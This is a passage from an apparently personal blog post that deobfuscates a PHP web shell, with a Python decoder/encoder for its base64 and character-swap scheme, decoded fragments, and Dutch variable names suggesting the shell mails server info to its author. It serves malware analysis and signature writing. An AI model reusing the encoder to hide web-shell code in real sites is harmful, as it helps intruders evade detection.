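    Whitespace from the line wrapping on the page is ignored by b64decode."""
    raw = base64.b64decode(b64).decode("latin-1")
    return decode_strtr(raw)


def encode_payload(plain):
    """Inverse of decode_payload: swap, then base64."""
    return base64.b64encode(encode_strtr(plain).encode("latin-1")).decode("ascii")


# The first 28 base64 characters of $_X exactly as printed above.
PAGE_PREFIX_B64 = "Pz48aHRtbD48aDUxZD48dDR0bDU+"

# Fragments from the stage-1 listing above, with their full decoding.
PAGE_FRAGMENTS = {
    "60au": "1024",
    "DC6uoC": "DC143C",
    "<H6>": "<H1>",
    "S1f5 M2d5 2f th4s S5rv5r 4s : ": "Safe Mode of this Server is : ",
    "p4tb3llg3ys@2nl4n5m14l.c2m": "pitbullguys@onlinemail.com",
}


def check_fragments():
    """Return the fragments whose decoding does not match the expected text (empty means all good)."""
    return {k: decode_strtr(k) for k, v in PAGE_FRAGMENTS.items() if decode_strtr(k) != v}


if __name__ == "__main__":
    print(decode_payload(PAGE_PREFIX_B64))   # ?><html><head><title>
    print(check_fragments())                 # {}
```

Because the table is a bijection, encode_payload() recreates files in exactly this format, which is handy if you want to write a signature for the obfuscated form (say, the swapped "f3nct42n 5x(" rather than "function ex(") instead of for the plaintext that only ever exists inside eval().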

Well, there's some similarity with test.txt, but this one has some added bits, and they're in Dutch. This is quite good really, as this happens to be my native tongue. It might have been Russian, Romanian or Rastafarian and I would not have known what it said. Approximately twice a year it comes in handy to know Dutch, and this is one of those times, already used up for 2008... Hopefully adventurecrazyjan@gmail.com won't mind if I say that, roughly translated,

$jaenwiemoethemdanontvangenhe means "yes and who should receive it now huh"; $enwelkonderwerpmoethethebben means "and what subject should it have", $ennatuurlijkmoetenwedeurlnietvergeten means "and of course we must not forget the url" and last but not least $hewehebbenooknoginfo means "hey we also have some info". Wonderful, no? I am still left with strings of nonsense letters & numbers after the slashes, so I'm obviously not done yet. Unless these are just sequences of random nonsense aimed at obfuscation. After all, they're comments, so they don't get evaluated. Maybe I should mail this adventure-crazy jan and ask him?

Oh and credit where it's due: I did not use pencil and paper to decode the base64 stuff. A beautiful decoder can be found here: http://makcoder.sourceforge.net/demo/base64.php. This one didn't fall over once, unlike some others I tried...